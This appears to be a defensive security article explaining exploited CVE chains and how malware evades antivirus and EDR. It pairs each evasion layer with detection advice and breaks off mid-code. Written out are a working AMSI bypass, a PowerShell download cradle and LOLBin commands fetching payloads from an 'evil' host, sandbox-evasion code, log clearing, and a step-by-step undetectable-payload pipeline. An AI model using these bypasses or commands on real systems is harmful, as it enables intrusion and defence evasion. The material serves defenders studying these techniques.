How Attackers Exploited It: The Russian threat group Storm-0978 (RomCom) used this in targeted attacks against NATO summit attendees and Ukrainian government organizations. The attack used a crafted .docx file that triggered a chain of HTML loads, each bypassing a different security boundary. The document loaded external HTML through MSHTML, which loaded additional content via search-ms: protocol handler, eventually achieving code execution through a Mark-of-the-Web bypass combined with a SmartScreen bypass. The final payload was the RomCom backdoor — a full RAT (Remote Access Trojan) with keylogging, screen capture, and data exfiltration capabilities.
Detection: Monitor Office processes for chains of child process creation. Look for search-ms: protocol handler invocations from document contexts. Block outbound HTTP from Office processes with firewall rules. Microsoft released emergency mitigations before the patch was ready.
The Vulnerability (CVE-2023-41064, BLASTPASS): A buffer overflow in Apple's ImageIO framework, specifically in the WebP image decoder (libwebp). The vulnerability existed in the Huffman coding table construction used during WebP lossless decompression. A crafted WebP image with malformed Huffman codes caused a heap buffer overflow when the decoder attempted to build the lookup table.
How Attackers Exploited It: NSO Group combined this with a second vulnerability (CVE-2023-41061, a PassKit/Wallet validation bypass) in a two-step zero-click chain. Step 1: An iMessage was sent containing a PassKit attachment (.pkpass file — normally used for Apple Wallet passes). The PassKit attachment contained a crafted WebP image that triggered CVE-2023-41064 heap overflow during automatic thumbnail generation. Step 2: The heap overflow exploited the Wallet validation bypass (CVE-2023-41061) to escape the BlastDoor sandbox that Apple had specifically built to prevent FORCEDENTRY-style attacks. The combined chain installed Pegasus spyware with full device access.
Why It Matters: This showed that even after Apple built BlastDoor specifically to stop zero-click iMessage exploits, NSO Group found a way around it within 2 years by chaining a different parser (WebP in ImageIO) with a different sandbox escape (PassKit). The same underlying libwebp flaw, tracked separately as CVE-2023-4863, also affected Chrome, Firefox, and virtually every application that used libwebp, making it one of the most impactful image parser bugs in history.
Detection: Update to iOS 16.6.1+. Monitor for unusually large .pkpass files received via iMessage. Apple's Lockdown Mode blocks PassKit previews in iMessage, which would have prevented this chain.
Across all 9 CVEs above, notice the recurring patterns: (1) Parser vulnerabilities: most of these exploits target code that parses complex data formats (OLE, JBIG2, WebP, SRTCP, PDF). (2) Privilege boundaries: attackers chain user-mode exploits with kernel exploits (CVE-2021-1732) or sandbox escapes (BLASTPASS). (3) Legacy components: EQNEDT32.EXE (17 years old), MSHTML/Trident (deprecated but still loadable), MSDT (rarely used diagnostic tool). (4) Protocol handlers: ms-msdt:, search-ms:, and mhtml: are URL schemes that bridge security boundaries. Disabling unnecessary protocol handlers and removing legacy components dramatically reduces attack surface.
You've seen how exploits work: the buffer overflows, the shellcode, the PDF weaponization. But here's the reality: none of that matters if antivirus catches it on delivery. This is where FUD (Fully Undetectable) comes in. Serious attackers often spend as much effort making a payload invisible as they do building the exploit itself. This section breaks down every layer of the evasion stack, the tools and techniques used, and how defenders catch each one.
This section explains evasion techniques so defenders and security analysts understand what they're up against. Every technique described here is documented in public threat intelligence reports, academic papers, and vendor advisories. Understanding evasion is essential for writing detection rules, tuning EDR policies, and conducting threat hunting. The goal: if you know how they hide, you know where to look.
In underground markets, FUD = Fully Undetectable — meaning a payload that returns 0 detections across all antivirus engines when scanned. The term comes from a simple test: upload your malware to a multi-scanner, check the results.
FUD lifespan: A fresh FUD payload typically lasts 24-72 hours before cloud-based AV (telemetry, behavioral ML, community submissions) picks it up. APT groups maintain dedicated teams that re-FUD payloads continuously. The underground economy charges $50-$150 per "re-crypt" to restore FUD status.
A file goes through 5 stages of analysis before it detonates on a target. Evasion means beating ALL of them:
① Static Signature: YARA-like byte pattern matching against known malware databases. Speed: microseconds. Bypass: change the bytes (encryption, packing, polymorphism).
② Heuristic Analysis: Rules that flag suspicious characteristics — high entropy, no imports, suspicious section names, packer signatures. Bypass: entropy reduction, import reconstruction, legitimate-looking PE structure.
③ Behavioral/Emulation: AV emulates the first ~1000 instructions in a mini sandbox to see what the code does. Bypass: environmental checks, delayed execution, anti-emulation tricks.
④ Cloud/ML Analysis: File hash and metadata sent to cloud for machine learning classification. Bypass: unique hash per target, metadata spoofing, signed executables.
⑤ Full Sandbox Detonation: File executed in an instrumented VM for 2-5 minutes. Monitors: API calls, network traffic, registry, file system. Bypass: VM detection, timing attacks, user interaction requirements.
The first and most fundamental evasion layer. The goal: make the file look like something it isn't so signature scanners can't pattern-match it.
What they do: Compress the entire executable into a compressed blob, then prepend a small "stub" that decompresses it into memory at runtime. The original code never exists on disk in readable form.
How it works:
Original EXE (100 KB)
├── .text → executable code (detectable)
├── .data → strings like "WinExec" (detectable)
└── .rsrc → resources
After UPX packing (40 KB):
├── UPX0 → empty (will be filled at runtime)
├── UPX1 → compressed blob (looks like random data)
└── stub → 2KB decompressor
└── At runtime: decompress UPX1 → UPX0 → jump to OEP
Common packers:
Detection: YARA rules for packer stubs (UPX! magic bytes), section name patterns (UPX0/UPX1), abnormal section entropy (>7.0), tiny import table (only LoadLibrary + GetProcAddress).
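The entropy and section-name heuristics above are simple to compute. The sketch below assumes the section names and raw bytes have already been extracted by a PE parser of your choice; `packing_indicators` and its `(name, raw_bytes)` input shape are hypothetical, while the 7.0 threshold and the UPX markers come from the text.

```python
import math
from collections import Counter

PACKER_SECTION_NAMES = {"UPX0", "UPX1"}
ENTROPY_THRESHOLD = 7.0  # bits per byte, as suggested in the text


def shannon_entropy(data):
    """Shannon entropy in bits per byte: 0.0 (constant data) to 8.0 (uniform)."""
    if not data:
        return 0.0
    total = len(data)
    return -sum((n / total) * math.log2(n / total) for n in Counter(data).values())


def packing_indicators(sections):
    """sections: iterable of (name, raw_bytes) pairs from an already-parsed PE file."""
    hits = []
    for name, raw in sections:
        if name in PACKER_SECTION_NAMES:
            hits.append(f"{name}: packer section name")
        if b"UPX!" in raw:
            hits.append(f"{name}: UPX! magic bytes")
        if shannon_entropy(raw) > ENTROPY_THRESHOLD:
            hits.append(f"{name}: entropy above {ENTROPY_THRESHOLD}")
    return hits
```

High entropy alone also describes legitimately compressed resources and installers, which is why the text pairs it with section names and import-table size rather than using it as a lone verdict.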
What they do: Encrypt the malware payload with AES/RC4/XOR, bundle it with a "stub" (decryptor) that decrypts and executes it in memory. The encrypted payload has zero recognizable signatures.
Architecture:
Crypter Output: ┌─────────────────────────────┐ │ STUB (clean decryptor) │ ← Looks legitimate │ ├── AES key (embedded) │ │ ├── Decrypt routine │ │ └── Execution method: │ │ ├── RunPE (hollowing) │ │ ├── Reflective inject │ │ └── Shellcode execute │ ├─────────────────────────────┤ │ ENCRYPTED PAYLOAD │ ← AES-256 encrypted │ (rat.exe, stealer.exe) │ No signatures visible │ Entropy: ~7.99/8.00 │ └─────────────────────────────┘
Stub types:
.NET stubs: use Assembly.Load() for in-memory .NET payload execution. Easy to build, but .NET metadata gives defenders more to analyze.
Detection: High entropy sections, small import table, suspicious API sequences (VirtualAlloc → memcpy → VirtualProtect(PAGE_EXECUTE) → CreateThread), decryption loop patterns in code.
Underground forums and Telegram channels sell FUD services as subscriptions. Typical pricing:
Crypter subscription: $30-150/month — includes daily stub updates to maintain FUD status
Single crypt: $15-50 — one-time encryption, FUD lasts 1-3 days
Private/custom crypter: $500-5,000 — hand-coded, unique stub, shared with <5 customers
FUD checking services: Private scanners (like antiscan.me) that test against 30+ AV engines without submitting samples to vendors (unlike VirusTotal which shares with all vendors)
Packers and crypters change how the payload looks on disk. Polymorphic and metamorphic engines go further — they change the code itself while preserving functionality.
Each time the malware copies itself or is generated, the decryption routine changes while the encrypted payload stays the same. The decryptor uses different registers, different instruction orders, and inserts junk code — so no two copies share the same byte signature.
// Generation 1: MOV ECX, 0x1A4 ; payload length MOV ESI, offset payload ; source XOR BYTE [ESI], 0x5A ; XOR key INC ESI LOOP decrypt // Generation 2 (same logic, different bytes): MOV EDX, 0x1A4 ; different register LEA EDI, [payload] ; different addressing SUB EDI, 1 next: INC EDI XOR BYTE [EDI], 0x5A DEC EDX JNZ next ; different loop construct
Detection: Emulation — let the AV run the decryptor, then scan the decrypted payload. Cloud ML on behavioral patterns rather than bytes.
The entire malware rewrites itself — not just the decryptor but the actual functional code. Techniques include: NOP insertion, register reassignment, instruction reordering, equivalent instruction substitution, code transposition, and junk code insertion.
Substitution examples: XOR EAX, EAX ↔ SUB EAX, EAX ↔ MOV EAX, 0 ADD EAX, 5 ↔ SUB EAX, -5 ↔ LEA EAX, [EAX+5] CMP EAX, 0; JE ↔ TEST EAX, EAX; JZ ↔ OR EAX, EAX; JZ PUSH EAX; POP EBX ↔ MOV EBX, EAX NOP ↔ XCHG EAX, EAX ↔ LEA EAX, [EAX] Code transposition: Original: [Block A] → [Block B] → [Block C] Rewritten: [Block C] → JMP B_addr [Block A] → JMP C_addr [Block B] → JMP end
Detection: Control flow graph analysis, behavioral signatures, code normalization (reduce equivalent instructions to canonical form before matching).
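Code normalization, the last item above, means rewriting equivalent instructions to one canonical spelling before a signature is compared. The sketch below works on textual disassembly and covers only a few of the register-value equivalences listed earlier; it deliberately ignores differences in flag side effects, and the function name `normalize` is hypothetical.

```python
import re

# Instructions that do nothing and can be dropped before matching.
NOP_EQUIVALENTS = {"nop", "xchg eax, eax", "lea eax, [eax]"}


def normalize(instructions):
    """Map equivalent instruction spellings to one canonical form and drop no-ops."""
    canonical = []
    for ins in instructions:
        # Lowercase, collapse whitespace, and force a single ", " operand separator.
        text = re.sub(r"\s*,\s*", ", ", " ".join(ins.lower().split()))
        if text in NOP_EQUIVALENTS:
            continue
        zeroing = (re.fullmatch(r"(?:xor|sub) (\w+), \1", text)
                   or re.fullmatch(r"mov (\w+), 0", text))
        if zeroing:
            reg = zeroing.group(1)
            canonical.append(f"xor {reg}, {reg}")
            continue
        adding = (re.fullmatch(r"sub (\w+), -(\d+)", text)
                  or re.fullmatch(r"lea (\w+), \[\1\+(\d+)\]", text))
        if adding:
            canonical.append(f"add {adding.group(1)}, {adding.group(2)}")
            continue
        canonical.append(text)
    return canonical
```

Two variants that differ only by these substitutions normalize to the same list, so one signature written against the canonical form covers both. Real engines do this on decoded instructions or an intermediate representation rather than on strings.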
The most effective evasion: never write the real payload to disk at all. Instead, inject it directly into the memory of a legitimate process. To the OS and security tools, it looks like svchost.exe or explorer.exe is running — but the attacker's code lives inside it.
The most common technique used by crypters. Creates a legitimate process in a suspended state, hollows out its memory, writes the malicious PE, then resumes execution.
Step-by-step:
1. CreateProcess("svchost.exe", CREATE_SUSPENDED)
→ Real svchost starts but frozen before first instruction
2. NtUnmapViewOfSection(hProcess, imageBase)
→ Guts removed — original svchost code unmapped
3. VirtualAllocEx(hProcess, imageBase, malwareSize, MEM_COMMIT)
→ Fresh memory allocated at same address
4. WriteProcessMemory(hProcess, imageBase, malwarePE)
→ Malware PE written into svchost's memory space
5. SetThreadContext(hThread, newEntryPoint)
→ EIP/RIP pointed to malware's entry point
6. ResumeThread(hThread)
→ "svchost.exe" is now running your malware
→ Task Manager shows: svchost.exe (legitimate name+path)
→ Parent process: services.exe (looks normal)
MITRE: T1055.012 Process Hollowing
DLL injection: CreateRemoteThread(LoadLibrary, "malware.dll"). Drops DLL to disk, injects into target process. Oldest method, well-detected. MITRE: T1055.001
APC injection: QueueUserAPC(shellcode, hThread). Queues malicious code to run next time the target thread enters an alertable wait state. Stealthier than CreateRemoteThread. MITRE: T1055.004
[...] amsi.dll) already loaded in process memory. Code runs from a backed (legitimate) memory region, which avoids "unbacked executable memory" detections.
Detection: Monitor for cross-process memory operations: VirtualAllocEx + WriteProcessMemory + CreateRemoteThread from a process that shouldn't be doing this. EDR hooks these APIs at the ntdll level.
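The API-sequence monitoring described in the Detection note can be sketched as an ordered-subsequence match over per-process call logs. The event format `(pid, api_name)` and the names `PATTERNS` and `detect_injection` are assumptions for illustration; real telemetry would also carry the target process handle so that same-process calls can be excluded.

```python
from collections import defaultdict

# Call orderings taken from the technique descriptions above.
PATTERNS = {
    "remote thread injection": ("VirtualAllocEx", "WriteProcessMemory", "CreateRemoteThread"),
    "process hollowing": ("NtUnmapViewOfSection", "WriteProcessMemory",
                          "SetThreadContext", "ResumeThread"),
}


def contains_in_order(calls, pattern):
    """True if every step of pattern appears in calls, in order, gaps allowed."""
    remaining = iter(calls)
    return all(step in remaining for step in pattern)


def detect_injection(events):
    """events: iterable of (pid, api_name) in time order. Returns {pid: [pattern names]}."""
    calls_by_pid = defaultdict(list)
    for pid, api in events:
        calls_by_pid[pid].append(api)
    findings = {}
    for pid, calls in calls_by_pid.items():
        matched = [name for name, pattern in PATTERNS.items()
                   if contains_in_order(calls, pattern)]
        if matched:
            findings[pid] = matched
    return findings
```

Allowing gaps between steps matters because injectors interleave unrelated calls; the cost is more false positives from debuggers and some installers, which is where an allowlist of expected source processes comes in.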
Even with encrypted payloads and process injection, modern EDR (Endpoint Detection and Response) instruments the OS at a deep level. Advanced attackers must specifically defeat these monitoring systems.
AMSI is Microsoft's content scanning pipeline. When PowerShell, .NET, JavaScript, VBScript, or Office VBA executes content, it passes through AMSI before running. AMSI sends the content (even if obfuscated) to the registered AV provider for scanning.
AMSI Pipeline: PowerShell script → amsi.dll!AmsiScanBuffer() → AV Engine → ALLOW / BLOCK ↑ Attackers patch HERE Bypass Method 1 — Memory Patching (most common): 1. GetProcAddress(amsi.dll, "AmsiScanBuffer") 2. VirtualProtect(addr, size, PAGE_EXECUTE_READWRITE) 3. Write: MOV EAX, 0x80070057; RET (= E_INVALIDARG → "scan passed") → Every future AmsiScanBuffer() call returns "clean" Bypass Method 2 — Forcing amsiInitFailed: [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils') .GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true) → AMSI thinks initialization failed → all scans skipped Bypass Method 3 — Unhooking amsi.dll: Map fresh copy of amsi.dll from disk → overwrite .text section → All patches/hooks are removed → clean DLL, no scanning
Defense: Defender for Endpoint monitors AMSI integrity. .NET ETW events log AMSI bypass attempts. Behavioral rule: any process calling VirtualProtect on amsi.dll regions is suspicious.
EDR products (CrowdStrike, SentinelOne, Defender for Endpoint) inject a DLL into every process; that DLL hooks critical API functions in ntdll.dll. When malware calls NtWriteVirtualMemory, the call first goes through the EDR's hook, which logs it and decides whether to allow or block.
How EDR hooks work: Normal: NtWriteVirtualMemory → syscall → kernel Hooked: NtWriteVirtualMemory → JMP edr_monitor.dll → log → syscall → kernel Unhooking Method 1 — Fresh ntdll mapping: 1. MapViewOfFile("C:\Windows\System32\ntdll.dll") // read clean copy 2. Find .text section in both loaded and clean copies 3. VirtualProtect(loaded_ntdll.text, RWX) 4. memcpy(loaded_ntdll.text, clean_ntdll.text) // overwrite hooks → All EDR hooks REMOVED — calls go directly to kernel Unhooking Method 2 — Direct syscalls (Syswhispers / Hell's Gate): Instead of calling ntdll!NtWriteVirtualMemory (which is hooked), the malware contains its OWN syscall stubs: MOV R10, RCX MOV EAX, 0x3A ; syscall number for NtWriteVirtualMemory SYSCALL ; jump directly to kernel — EDR never sees it Tools that implement this: • SysWhispers — generates syscall stubs at compile time • Hell's Gate — resolves syscall numbers dynamically at runtime • Halo's Gate — handles partially-hooked ntdll scenarios • RecycledGate / FreshyCalls — variant approaches
Defense: Kernel-level ETW (Event Tracing for Windows) still sees syscalls. Kernel callbacks (PsSetCreateProcessNotifyRoutine, ObRegisterCallbacks) operate at a level malware can't unhook from userland. Modern EDRs combine userland hooks + kernel telemetry for this reason.
ETW (Event Tracing for Windows) is the OS-level logging framework. .NET events, PowerShell script blocks, process creation, and network connections all flow through ETW providers to security tools. Patching ETW inside a process suppresses the events that process emits from user mode, hiding it from tools that rely on those providers alone.
ETW Patch (disable logging for current process): 1. GetProcAddress(ntdll.dll, "EtwEventWrite") 2. Write: RET (0xC3) at the entry point → EtwEventWrite immediately returns → no events logged → PowerShell ScriptBlock logging: GONE → .NET assembly load events: GONE → Process telemetry from this process: GONE What disappears: • Microsoft-Windows-PowerShell/Operational log entries • .NET CLR loading events (Assembly.Load visible normally) • WMI activity events • Network connection attribution to this process
Defense: Monitor for ETW provider registration changes. Kernel-level drivers (minifilters) can detect ETW tampering. Integrity checks on ntdll.dll function prologues (detect single-byte patches).
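The prologue integrity check named above can be sketched as a plain byte comparison between a trusted copy of a function's first bytes (for example, read from the on-disk ntdll.dll) and the bytes currently mapped in the process. How those bytes are collected is outside this sketch, and `check_prologue`, `PrologueFinding`, and the sample bytes are hypothetical names and values chosen for illustration.

```python
from dataclasses import dataclass
from typing import Optional

# Opcodes for near RET and RET imm16; a function that *starts* with one of
# these returns immediately, which is what a single-byte patch looks like.
RET_OPCODES = {0xC3, 0xC2}


@dataclass
class PrologueFinding:
    tampered: bool                     # any byte differs from the trusted copy
    first_diff_offset: Optional[int]   # offset of the first differing byte
    starts_with_ret: bool              # in-memory code begins with RET


def check_prologue(trusted: bytes, in_memory: bytes) -> PrologueFinding:
    """Compare a function's in-memory prologue against a trusted copy."""
    n = min(len(trusted), len(in_memory))
    first_diff = next(
        (i for i in range(n) if trusted[i] != in_memory[i]), None
    )
    starts_with_ret = bool(in_memory) and in_memory[0] in RET_OPCODES
    return PrologueFinding(first_diff is not None, first_diff, starts_with_ret)


if __name__ == "__main__":
    clean = bytes.fromhex("4c8bdc48")    # made-up prologue bytes
    patched = bytes.fromhex("c38bdc48")  # same bytes with byte 0 overwritten
    print(check_prologue(clean, patched))
```

A mismatch is a lead rather than a verdict: EDR products place their own hooks in the same prologues, so a real check would need an allowlist of expected modifications.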
Security sandboxes (AV emulators, corporate detonation chambers, VirusTotal) run suspicious files in monitored environments. Sophisticated malware fingerprints the environment and refuses to execute if it detects analysis.
── Environment Fingerprinting ── // CPU check — sandboxes often have ≤2 cores if (GetSystemInfo().dwNumberOfProcessors < 2) ExitProcess(0); // RAM check — sandboxes often have ≤4GB MEMORYSTATUSEX mem; GlobalMemoryStatusEx(&mem); if (mem.ullTotalPhys < 4ULL * 1024 * 1024 * 1024) ExitProcess(0); // Uptime check — sandbox VMs are freshly booted if (GetTickCount64() < 600000) Sleep(600000); // wait 10 min // Process count — real systems have 50+ processes DWORD procs[1024]; EnumProcesses(procs, sizeof(procs), &needed); if (needed/sizeof(DWORD) < 40) ExitProcess(0); // Mouse movement — sandboxes don't move the mouse POINT p1, p2; GetCursorPos(&p1); Sleep(5000); GetCursorPos(&p2); if (p1.x == p2.x && p1.y == p2.y) ExitProcess(0); // Username/hostname check — avoid "sandbox", "virus", "malware" char name[256]; DWORD sz = 256; GetComputerNameA(name, &sz); if (strstr(name, "sandbox") || strstr(name, "virus")) ExitProcess(0); ── Hypervisor / VM Detection ── // CPUID hypervisor bit (bit 31 of ECX from leaf 1) __cpuid(regs, 1); if (regs[2] & (1 << 31)) ExitProcess(0); // running in VM // VMware I/O port backdoor MOV EAX, 'VMXh'; MOV ECX, 0Ah; MOV EDX, 'VX'; IN EAX, DX // If no exception → running in VMware // Registry keys — VM guest tools leave traces RegOpenKey(HKLM, "SOFTWARE\\VMware, Inc.\\VMware Tools", &key); RegOpenKey(HKLM, "SOFTWARE\\Oracle\\VirtualBox Guest Additions", &key); ── Anti-Debug ── // Direct API check if (IsDebuggerPresent()) ExitProcess(0); // PEB flag (manual check — bypasses API hooks) BOOL dbg = *(PBYTE)(__readgsqword(0x60) + 2); // PEB.BeingDebugged // Timing-based — debug stepping is slow LARGE_INTEGER t1, t2; QueryPerformanceCounter(&t1); // ... some code ... QueryPerformanceCounter(&t2); if ((t2.QuadPart - t1.QuadPart) > 10000) ExitProcess(0);
The ultimate evasion: never drop a file at all. Use tools already on the victim's machine (LOLBins — Living Off the Land Binaries) and execute entirely from memory, scripts, or built-in OS features.
Example 1 — PowerShell Download Cradle (nothing written to disk): powershell -nop -w hidden -ep bypass -c "IEX(New-Object Net.WebClient).DownloadString('https://evil/payload.ps1')" → Script downloads into memory → executes → loads .NET assembly → injects into explorer.exe → Zero files on disk. Zero artifacts in Downloads. Only evidence: PowerShell logs (if enabled). Example 2 — Macro → WMI Persistence (survives reboot without files): Sub AutoOpen() Set objWMI = GetObject("winmgmts:\\.\root\subscription") ' Create WMI event subscription → runs PowerShell on every boot ' Payload stored in WMI repository (C:\Windows\System32\wbem\Repository) ' No visible file. No scheduled task. No registry run key. End Sub Example 3 — Registry-resident payload: reg add HKCU\Software\Classes\Payload /v data /t REG_BINARY /d <shellcode_hex> → Shellcode stored in registry value → Loader reads registry → VirtualAlloc → memcpy → CreateThread → Payload lives in the registry hive, never as a file
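These are signed Microsoft binaries already present on most Windows machines. They have legitimate functions but can be abused to download, decode, execute, or proxy malicious payloads. Blanket-blocking them is rarely practical because they are part of Windows and legitimate workflows depend on them, so defenders restrict them with application control policies (AppLocker, WDAC) and watch how they are used.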
| LOLBin | Legitimate Purpose | Abuse Technique | MITRE |
|---|---|---|---|
| certutil.exe | Certificate management | certutil -urlcache -split -f http://evil/payload.exe (downloads files) | T1105 |
| mshta.exe | HTML Application host | mshta http://evil/payload.hta (executes arbitrary VBScript/JScript) | T1218.005 |
| rundll32.exe | Execute DLL functions | rundll32 javascript:"\..\mshtml,RunHTMLApplication"; + WSH script | T1218.011 |
| regsvr32.exe | Register COM objects | regsvr32 /s /n /u /i:http://evil/payload.sct scrobj.dll (Squiblydoo attack) | T1218.010 |
| msbuild.exe | .NET Build tool | Build a .csproj with inline C# task → compile + execute arbitrary code | T1127.001 |
| bitsadmin.exe | Background file transfer | bitsadmin /transfer job /download http://evil/payload.exe | T1197 |
| wmic.exe | WMI management | wmic process call create "powershell -enc <base64>" | T1047 |
| cmstp.exe | Connection Manager installer | Provide malicious .inf file → executes arbitrary commands, bypasses UAC | T1218.003 |
Detection: Sigma rules flagging unusual parent-child process chains (e.g., WINWORD.EXE → mshta.exe). Behavioral baselines: certutil making HTTP requests, or msbuild executing outside of developer systems. The LOLBAS project (lolbas-project.github.io) catalogs documented abuse techniques.
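The parent-child rule described above can be sketched in a few lines. This is a minimal illustration, not a Sigma rule: the event format (dicts with `parent` and `child` image paths), the two name sets, and the function names are assumptions made for the example, and a real rule set would be tuned to the environment.

```python
import ntpath

# Hypothetical starting lists; tune both to the environment being monitored.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {
    "mshta.exe", "powershell.exe", "cmd.exe", "wscript.exe",
    "cscript.exe", "regsvr32.exe", "rundll32.exe", "certutil.exe",
}


def image_name(path: str) -> str:
    """Lower-cased file name of a Windows image path (works on any OS)."""
    return ntpath.basename(path).lower()


def flag_suspicious_chains(events):
    """Return (parent, child) pairs where an Office app spawned a script host.

    `events` is an iterable of dicts with 'parent' and 'child' image paths,
    for example extracted from process-creation logs.
    """
    hits = []
    for ev in events:
        parent, child = image_name(ev["parent"]), image_name(ev["child"])
        if parent in OFFICE_PARENTS and child in SCRIPT_HOSTS:
            hits.append((parent, child))
    return hits


if __name__ == "__main__":
    sample = [
        {"parent": r"C:\Program Files\Microsoft Office\WINWORD.EXE",
         "child": r"C:\Windows\System32\mshta.exe"},
        {"parent": r"C:\Windows\explorer.exe",
         "child": r"C:\Windows\System32\cmd.exe"},
    ]
    print(flag_suspicious_chains(sample))
```

Matching on image names alone is easy to evade by renaming binaries, so a production rule would also compare original file names or hashes.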
The final layers that separate amateur RATs from nation-state implants.
C2 implants spend 99% of their time sleeping between check-ins. During sleep, the shellcode sits in readable memory — perfect for memory scanners. Sleep obfuscation encrypts the beacon's memory during sleep and decrypts only when it wakes up to check in.
Ekko Sleep Obfuscation:
1. Create timer queue (ROP chain using NtContinue)
2. Set timer callback: VirtualProtect(beacon, RW)
3. Set timer callback: SystemFunction032(beacon, key) // RC4 encrypt
4. Set timer callback: Sleep(60000) // 60s sleep
5. Set timer callback: SystemFunction032(beacon, key) // RC4 decrypt
6. Set timer callback: VirtualProtect(beacon, RX)
7. Queue all timers → beacon memory ENCRYPTED during sleep
→ Memory scan during sleep sees: encrypted garbage
→ Memory scan when awake: 0.5s window to catch it
Detection: Detect memory regions whose protection flips from executable to RW and back on a timer. Scan for timer queue chains with suspicious callbacks. Thread stack analysis for NtContinue ROP gadgets.
Windows SmartScreen and AV reputation engines trust signed binaries. Attackers exploit this trust through:
Detection: Certificate reputation checks. Flag newly issued certs. Check for known stolen cert serial numbers (Stuxnet: Realtek 01 00 00 00 00 01 1E 3B 4E).
Encrypted/packed payloads have high entropy (~7.9/8.0). Security tools flag this. Attackers reduce entropy to look like normal executables (~5.0-6.5):
Detection: Per-section entropy analysis (not whole-file). Detect large resource sections with English text + code sections with high entropy = suspicious combination.
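Per-section entropy is straightforward to compute once the section bytes are available. The sketch below assumes the caller has already extracted each section's raw bytes (for instance with a PE parsing library) into a dict; the function names and the 7.0 threshold are illustrative choices, not a vendor's actual rule.

```python
import math
from collections import Counter
from typing import Dict


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte (0.0 to 8.0)."""
    if not data:
        return 0.0
    total = len(data)
    return -sum(
        (count / total) * math.log2(count / total)
        for count in Counter(data).values()
    )


def high_entropy_sections(sections: Dict[str, bytes],
                          threshold: float = 7.0) -> Dict[str, float]:
    """Return {section name: entropy} for sections above the threshold."""
    scores = {name: shannon_entropy(raw) for name, raw in sections.items()}
    return {name: h for name, h in scores.items() if h > threshold}


if __name__ == "__main__":
    demo = {
        ".text": b"\x55\x48\x89\xe5" * 256,  # repetitive, low entropy
        ".rsrc": bytes(range(256)) * 16,     # uniform bytes, maximum entropy
    }
    print(high_entropy_sections(demo))
```

Scoring each section separately is what defeats padding tricks: low-entropy filler lowers the whole-file average but leaves the encrypted section's own score unchanged.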
After landing on a system, attackers cover their tracks:
[…] SetFileTime() or NtSetInformationFile). A dropped malware.exe gets timestamps from 2019 to blend with surrounding files. T1070.006
wevtutil cl Security or Clear-EventLog. Nukes the Security event log. Ironic: clearing the log generates Event ID 1102 (log was cleared). T1070.001
Detection: The $MFT (Master File Table) keeps a second set of timestamps in each file's $FILE_NAME attribute, which usually retains the original values even when the $STANDARD_INFORMATION (MACE) timestamps are modified. Centralized SIEM: logs forwarded in real time can't be retroactively deleted from the SIEM. Event ID 1102 alerts. JA3 fingerprinting of C2 traffic.
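The $MFT comparison can be sketched as follows. NTFS stores timestamps in two attributes per file: $STANDARD_INFORMATION, which timestamp-setting APIs modify, and $FILE_NAME, which they normally do not. The sketch assumes an MFT parser has already produced both creation times; `MftRecord` and the function names are hypothetical, and the heuristic yields false positives (copied or extracted files can look similar), so treat hits as leads.

```python
from dataclasses import dataclass
from datetime import datetime
from typing import Iterable, List


@dataclass
class MftRecord:
    path: str
    si_created: datetime  # $STANDARD_INFORMATION creation time
    fn_created: datetime  # $FILE_NAME creation time


def likely_timestomped(rec: MftRecord, tolerance_s: float = 1.0) -> bool:
    """True when the $SI creation time predates the $FN creation time.

    A file cannot normally have been created before its own name entry
    existed, so a backdated $SI value is a common timestomping indicator.
    """
    return (rec.fn_created - rec.si_created).total_seconds() > tolerance_s


def flag_timestomped(records: Iterable[MftRecord]) -> List[MftRecord]:
    """Filter the records that trip the heuristic."""
    return [r for r in records if likely_timestomped(r)]


if __name__ == "__main__":
    recs = [
        MftRecord(r"C:\Users\Public\malware.exe",
                  datetime(2019, 3, 1, 12, 0, 0),
                  datetime(2024, 5, 2, 9, 30, 0)),
        MftRecord(r"C:\Users\Public\notes.txt",
                  datetime(2024, 5, 2, 9, 30, 0),
                  datetime(2024, 5, 2, 9, 30, 0)),
    ]
    for r in flag_timestomped(recs):
        print("review:", r.path)
```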
Here's how a real-world attacker combines every layer into one delivery:
STEP 1 — Build the payload Tool: Custom RAT / Cobalt Strike / Sliver C2 framework Output: beacon.exe (detected by 58/72 AV engines — completely burned) STEP 2 — Encrypt with crypter (static evasion) Tool: Private crypter (native C stub + AES-256) Process: beacon.exe → AES encrypt → embed in stub → output.exe Result: 12/72 detections (heuristics still flag it — stub pattern known) STEP 3 — Add process injection (runtime evasion) Stub modified: decrypt in memory → process hollow into RuntimeBroker.exe Result: 3/72 detections (behavioral heuristics on injection pattern) STEP 4 — Anti-sandbox + anti-debug Add: CPU cores check, RAM check, 10-min sleep delay, mouse movement check Result: 1/72 detections (one ML engine still suspicious of PE structure) STEP 5 — Entropy reduction + signing Pad resource section with legitimate strings, sign with purchased EV cert Result: 0/72 detections — FUD achieved STEP 6 — Embed in delivery vehicle Option A: Pack into ISO/IMG → attach to spearphishing email (bypasses MotW) Option B: Embed in PDF via /Launch or /OpenAction JavaScript Option C: Host on compromised website → drive-by download Option D: Side-load via legitimate signed application (DLL hijacking) STEP 7 — Post-exploitation stealth - AMSI patch (PowerShell now unmonitored) - ETW patch (telemetry disabled for this process) - Sleep encryption (Ekko — encrypted during 60s sleep cycles) - Timestomp dropped files to match explorer.exe dates - C2 over DNS-over-HTTPS to Cloudflare (looks like normal DNS traffic) TOTAL EVASION LAYERS: 7 stacked techniques COMBINED COST: ~$500-2000 (crypter + cert + C2 infra) FUD LIFESPAN: 1-3 days before cloud telemetry catches it
Every evasion technique above has detection opportunities. The key insight: attackers can't evade every layer simultaneously.
Behavioral detection catches what signatures miss — even a FUD binary must eventually call VirtualAlloc → WriteProcessMemory → CreateRemoteThread. EDR sees the behavior, not the bytes.
Network detection catches what endpoint evasion misses — the C2 beacon must communicate. Even DNS-over-HTTPS C2 creates detectable traffic patterns (periodic intervals, fixed packet sizes).
Kernel telemetry catches what userland unhooking misses — kernel callbacks and ETW at the kernel level still report process creation, thread injection, and memory allocation even when ntdll hooks are removed.
Memory forensics catches what sleep obfuscation misses: periodic memory scans have a statistical chance of catching the beacon during its brief awake window. Regions whose protection repeatedly flips between executable and RW are themselves suspicious.
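The network-detection point above (periodic check-ins leave a pattern) can be illustrated with a simple regularity score over connection timestamps. This is a sketch under stated assumptions: the input is a list of connection times in seconds for one host and destination pair, and the function names and the 0.1 cutoff are arbitrary illustrative choices. Implants that add jitter will score higher, so real detections combine this with other features such as payload sizes.

```python
import statistics
from typing import Optional, Sequence


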